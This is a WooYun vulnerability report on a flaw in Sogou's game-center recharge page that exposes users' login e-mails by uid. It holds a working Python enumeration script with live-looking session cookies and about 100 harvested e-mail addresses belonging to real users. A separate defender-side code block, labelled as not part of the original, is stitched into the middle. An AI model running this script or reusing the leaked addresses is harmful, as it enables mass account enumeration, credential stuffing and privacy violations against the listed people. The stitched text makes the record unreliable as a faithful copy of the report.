
Defect ID: wooyun-2015-0130387

Title: 60 million Sogou users' login e-mail addresses can be enumerated via uid

Vendor: Sogou

Author: Vinc

Submitted: 2015-07-30 10:37

Fixed: 2015-09-13 11:00

Published: 2015-09-13 11:00

Type: sensitive information disclosure

Severity: Medium

Self-assessed rank: 10

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-07-30: details sent to the vendor, awaiting vendor handling
2015-07-30: vendor has confirmed; details disclosed to the vendor only
2015-08-09: details disclosed to core white hats and relevant domain experts
2015-08-19: details disclosed to regular white hats
2015-08-29: details disclosed to intern white hats
2015-09-13: details disclosed to the public

Summary:

Inspired by this report: http://wooyun.org/bugs/wooyun-2014-077356

Detailed description:

1. The Sogou game center site: http://wan.sogou.com/p/index.do
2. The recharge page lets you top up another user's account.
That page lets you enumerate uids to obtain other users' e-mail addresses, which could then be used for brute forcing or credential stuffing.
Probing uid values shows there are 60 million+ users.
The POST request is as follows:

[image 123.png: the POST request]


Python script attached:

import httplib
import re
import urllib

if __name__ == '__main__':
    # Walk uid values 0..999; each request names a different target account
    for i in range(1000):
        params = urllib.urlencode({'gid': '233', 'sid': '21', 'paygate': '-331', 'amount': '10', 'uid': i})
        headers = {
            "Cookie": "IPLOC=CN2100; SUID=63043D777D23900A000000005552F7EA; SUV=00D766AC773D04635552F7EB7AADD090; usid=63043D7730890E0A000000005563D38A; CNZZDATA1255303155=1173610824-1438220021-%7C1438220021; swfLayer=1; ppinf=5|1438220959|1439430559|Y2xpZW50aWQ6NDoxMTAwfGNydDoxMDoxNDM4MjIwOTU5fHJlZm5pY2s6MDp8dHJ1c3Q6MToxfHVzZXJpZDoxOTpkb250c2F5aGVoZUAxNjMuY29tfHVuaXFuYW1lOjk6MTEyMzQyMzExfA; pprdig=pgpiRH6X-cilVdO8pLT6V2s5gcos7yfRdrabmaNieW1v0MJawaw-M3qUMkNr_hovhIZZ0ZeQsD7yPnehRoZrb5BJA8bY5BDKs1awJwVDqhlPsLplQrsWSXB3hrUYGXTdKKhCgV-a3Pwi6qeSlGF6iJ4lD_qeDE8PifX6cA1GZDA; email=**********; SSUID=BEF747DFDC68FA329D3F93994957BE5A; ppmdig=1438220960000000dd5308bce1c345c0d36e8be0ae55856e; hostid=40731406; JSESSIONID=aaaiTZSNM3yNBghhKPC7u",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "Connection": "keep-alive",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache",
            "Accept": "*/*",
            "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
        }
        # strict=True, 2-second timeout
        conn = httplib.HTTPConnection('wan.sogou.com', 80, True, 2)
        conn.request(method="POST", url="/payconfirm.do", body=params, headers=headers)
        response = conn.getresponse()
        body = response.read()
        # The confirmation page echoes the target account's e-mail inside <dd id="dUid" class="font-black">...</dd>
        usermail = re.findall(r'(?<= id="dUid" class="font-black">).*?(?=</dd>)', body)
        if usermail:
            print usermail[0]
        conn.close()
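As an added, defender-side illustration that is not part of the original report and not Sogou's code: a toy model of the recharge confirmation handler in its reported form (echoing the target account's full login e-mail for any uid the caller supplies) beside a hardened form that returns only a masked address and caps how many distinct recipients one session may look up, plus a log check that flags sessions walking many uids. The account table, the session ids, the access-log format, the thresholds and the names ACCOUNTS, EnumerationGuard, hardened_payconfirm and flag_enumerating_sessions are all constructed assumptions for this example.

```python
import re
from collections import defaultdict

# Constructed sample account table (uid -> login e-mail); not real data.
ACCOUNTS = {
    1: "alice@example.com",
    2: "bob@example.com",
    3: "carol@example.com",
}


def vulnerable_payconfirm(uid):
    """Models the reported behaviour: the confirmation page echoes the full
    login e-mail of whatever uid the caller supplies, so walking uids turns
    the top-up feature into an e-mail directory."""
    email = ACCOUNTS.get(uid)
    if email is None:
        return None
    return '<dd id="dUid" class="font-black">%s</dd>' % email


def mask_email(email):
    """Keep just enough of the local part for a gifter to recognise the
    intended recipient; the full address never leaves the server."""
    local, _, domain = email.partition("@")
    if len(local) <= 2:
        shown = local[0] + "*"
    else:
        shown = local[0] + "*" * (len(local) - 2) + local[-1]
    return shown + "@" + domain


class EnumerationGuard:
    """Per-session cap on distinct target uids (assumed policy). A real
    gifter tops up a handful of friends; a script walking millions of uids
    trips this within a few requests."""

    def __init__(self, max_distinct=5):
        self.max_distinct = max_distinct
        self.seen = defaultdict(set)

    def allow(self, session_id, uid):
        seen = self.seen[session_id]
        if uid in seen:
            return True
        if len(seen) >= self.max_distinct:
            return False
        seen.add(uid)
        return True


def hardened_payconfirm(session_id, uid, guard):
    """Returns (status, body): throttles lookups and masks the address."""
    if not guard.allow(session_id, uid):
        return (429, "too many different recipients in this session")
    email = ACCOUNTS.get(uid)
    if email is None:
        return (404, "no such recipient")
    return (200, '<dd id="dUid" class="font-black">%s</dd>' % mask_email(email))


# Detection side: constructed access-log format  ip session "POST path" uid=N
LOG_RE = re.compile(r'^(?P<ip>\S+) (?P<session>\S+) "POST /payconfirm\.do" uid=(?P<uid>\d+)$')


def flag_enumerating_sessions(log_lines, threshold=20):
    """Return {session: distinct uid count} for sessions that queried at
    least `threshold` different target uids."""
    uids = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            uids[m.group("session")].add(int(m.group("uid")))
    return {s: len(u) for s, u in uids.items() if len(u) >= threshold}


# Constructed sample: sessA walks uid 1..50, sessB tops up one friend twice.
SAMPLE_LOG = ['10.0.0.5 sessA "POST /payconfirm.do" uid=%d' % i for i in range(1, 51)] + [
    '10.0.0.9 sessB "POST /payconfirm.do" uid=7',
    '10.0.0.9 sessB "POST /payconfirm.do" uid=7',
]

if __name__ == "__main__":
    print(vulnerable_payconfirm(2))
    g = EnumerationGuard(max_distinct=2)
    for uid in (1, 2, 3):
        print(hardened_payconfirm("s1", uid, g))
    print(flag_enumerating_sessions(SAMPLE_LOG))
```

The two controls address different halves of the problem: masking removes the value of each individual response, and the per-session cap (or the equivalent alert from the log check) removes the ability to collect millions of them. Keying the cap on the authenticated session rather than on the client IP matters, because the script in the report sends one valid session cookie with every request.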

Proof of vulnerability:

Don't run it too fast; I ran 100 as a test.
zhaozhe112@sohu.com
zhaozhe112234@sogou.com
bellwill@sogou.com
gaodingsogou@sogou.com
burst@sogou.com
bellscape@sogou.com
testxiuew@sogou.com
zhaozhe1123x@sogou.com
hotfall@sohu.com
xn-test1@sogou.com
loveystar@chinaren.com
liuxu-sogou@sogou.com
rainbow8416@sogou.com
liuxv87@sogou.com
caodanaxx1@sogou.com
wx2011916105724@sogou.com
burst009x@sogou.com
burst00786@sogou.com
gg123xo@sogou.com
txieiwowe@sogou.com
sonicfeng1981@sohu.com
burstx980@sogou.com
xn-test2@sogou.com
xianghuiru108@sohu.com
hotfall@sogou.com
caodanx@sogou.com
zhongshenxx@sogou.com
a123xy@sogou.com
axx98xl@sogou.com
axx1238-@sogou.com
xfew9874@sogou.com
stdio1@sohu.com
xn-test3@sogou.com
xn-test4@sogou.com
burst123x@sogou.com
xianghuiru5678@sogou.com
bellzhong123@sogou.com
lx187654@sogou.com
zhaozhezheng@sogou.com
xn-test5@sogou.com
sogou_open@sogou.com
a1520008935@sogou.com
xn-test6@sogou.com
xn-test7@sogou.com
a649577224@sogou.com
rty5664@sogou.com
lilin199211@sogou.com
xuexiaozhou123@sogou.com
et1130179276@sogou.com
hjhghgnb@sogou.com
wsnm1336149162@sogou.com
zjj825827@sohu.com
ww392220261@sogou.com
ljc34522748@sogou.com
w1611310734@sogou.com
sw1579483698@sogou.com
t6r65556653@sogou.com
ggf1228801615@sogou.com
w19920622@sogou.com
qiuchaojn@sogou.com
ij919440687@sogou.com
lxtext@sogou.com
a1107937270@sogou.com
dhfudshgufdg@sogou.com
qwertyuiop147236@sogou.com
qw06123456@sogou.com
yh5445456@sogou.com
jixueli@sogou.com
wss188@sogou.com
h1256508348@sogou.com
jasq@sogou.com
s994256021@sogou.com
zxc1693231929@sogou.com
u1403233627@sogou.com
qweas1073909212@sogou.com
a1491255961@sogou.com
dongdan114@sogou.com
liminhe@sogou.com
xt1230.123@sogou.com
yhhggy@sogou.com
laotian_2000_2000@chinaren.com
hgfhvghggvf@sogou.com
kuanglianpu1@sogou.com
as625673784@sogou.com
q17992140714@sogou.com
gk1094918561@sogou.com
xiaozhuge2@sogou.com
jim.@sogou.com
wangyan_works@sogou.com
q616066451@sogou.com
ffgklpglper@sogou.com
香百合1@focus.cn
a422193476@sogou.com
hgfjdsawu@sogou.com
jvb132@sogou.com
f1591268761@sogou.com
qrwerwt3465hrt@sogou.com
a1346927986482@sogou.com
gulang.com@sogou.com
zxvgbgf@sogou.com
zhi787747702@sogou.com
a1554567397@sogou.com
wm798200@focus.cn
abc-.@sogou.com
zhou1786962732@sogou.com

Fix recommendation:

Copyright notice: when reposting, please credit the source: Vinc@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 10

Confirmed: 2015-07-30 10:58

Vendor reply:

Thanks for your support!

Latest status:

None yet

